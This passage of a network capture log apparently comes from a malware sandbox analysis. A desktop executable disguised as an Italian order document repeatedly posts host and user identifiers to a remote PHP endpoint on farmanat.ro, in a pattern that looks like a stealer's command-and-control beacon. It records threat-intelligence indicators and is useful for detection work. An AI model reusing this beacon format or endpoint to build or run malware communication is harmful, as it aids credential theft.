Nov 25, 2021 10:52:07.303674936 CET	6967	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
467	192.168.11.20	50311	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:07.736749887 CET	6968	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:07.770236015 CET	6968	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:07.820126057 CET	6968	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
468	192.168.11.20	50312	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:08.228883982 CET	6969	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:08.262440920 CET	6969	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:08.315520048 CET	6970	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
469	192.168.11.20	50313	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:08.719767094 CET	6970	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:08.754209042 CET	6971	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:08.804300070 CET	6971	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.11.20	49883	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:31.831959963 CET	6375	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:31.865540028 CET	6375	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:31.919064045 CET	6376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
470	192.168.11.20	50314	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:09.223408937 CET	6972	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:09.257425070 CET	6972	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:09.313186884 CET	6972	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
471	192.168.11.20	50315	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:09.728245974 CET	6973	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:09.762285948 CET	6973	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:09.812256098 CET	6974	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
472	192.168.11.20	50316	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:10.154548883 CET	6974	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:10.188919067 CET	6975	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:10.241029024 CET	6975	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
473	192.168.11.20	50317	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:10.673270941 CET	6976	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:10.706855059 CET	6976	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:10.756206036 CET	6976	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
474	192.168.11.20	50318	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:11.194119930 CET	6977	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:11.228583097 CET	6977	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:11.296035051 CET	6978	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
475	192.168.11.20	50319	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:11.717968941 CET	6978	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:11.751519918 CET	6979	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:11.803318977 CET	6979	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
476	192.168.11.20	50320	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:12.234683037 CET	6980	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:12.268924952 CET	6980	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:12.319963932 CET	6980	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
477	192.168.11.20	50321	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:12.694839001 CET	6981	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:12.728185892 CET	6981	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:12.788178921 CET	6982	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
478	192.168.11.20	50322	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:13.182188034 CET	6982	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:13.216311932 CET	6983	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:13.267443895 CET	6983	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
479	192.168.11.20	50323	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:13.677236080 CET	6984	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:13.710833073 CET	6984	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:13.760864019 CET	6984	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.11.20	49884	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:32.435657024 CET	6376	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:32.469261885 CET	6377	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:32.519407034 CET	6377	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
480	192.168.11.20	50324	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:14.189707041 CET	6985	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:14.223253965 CET	6985	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:14.273739100 CET	6986	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
481	192.168.11.20	50325	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:14.713649988 CET	6986	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:14.747116089 CET	6987	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:14.800133944 CET	6987	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
482	192.168.11.20	50326	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:15.234437943 CET	6988	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:15.268006086 CET	6988	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:15.320163965 CET	6988	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
483	192.168.11.20	50327	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:15.707320929 CET	6989	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:15.741425037 CET	6989	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:15.799293995 CET	6990	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
484	192.168.11.20	50328	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:16.204602957 CET	6990	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:16.238796949 CET	6991	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:16.295562983 CET	6991	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
485	192.168.11.20	50329	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
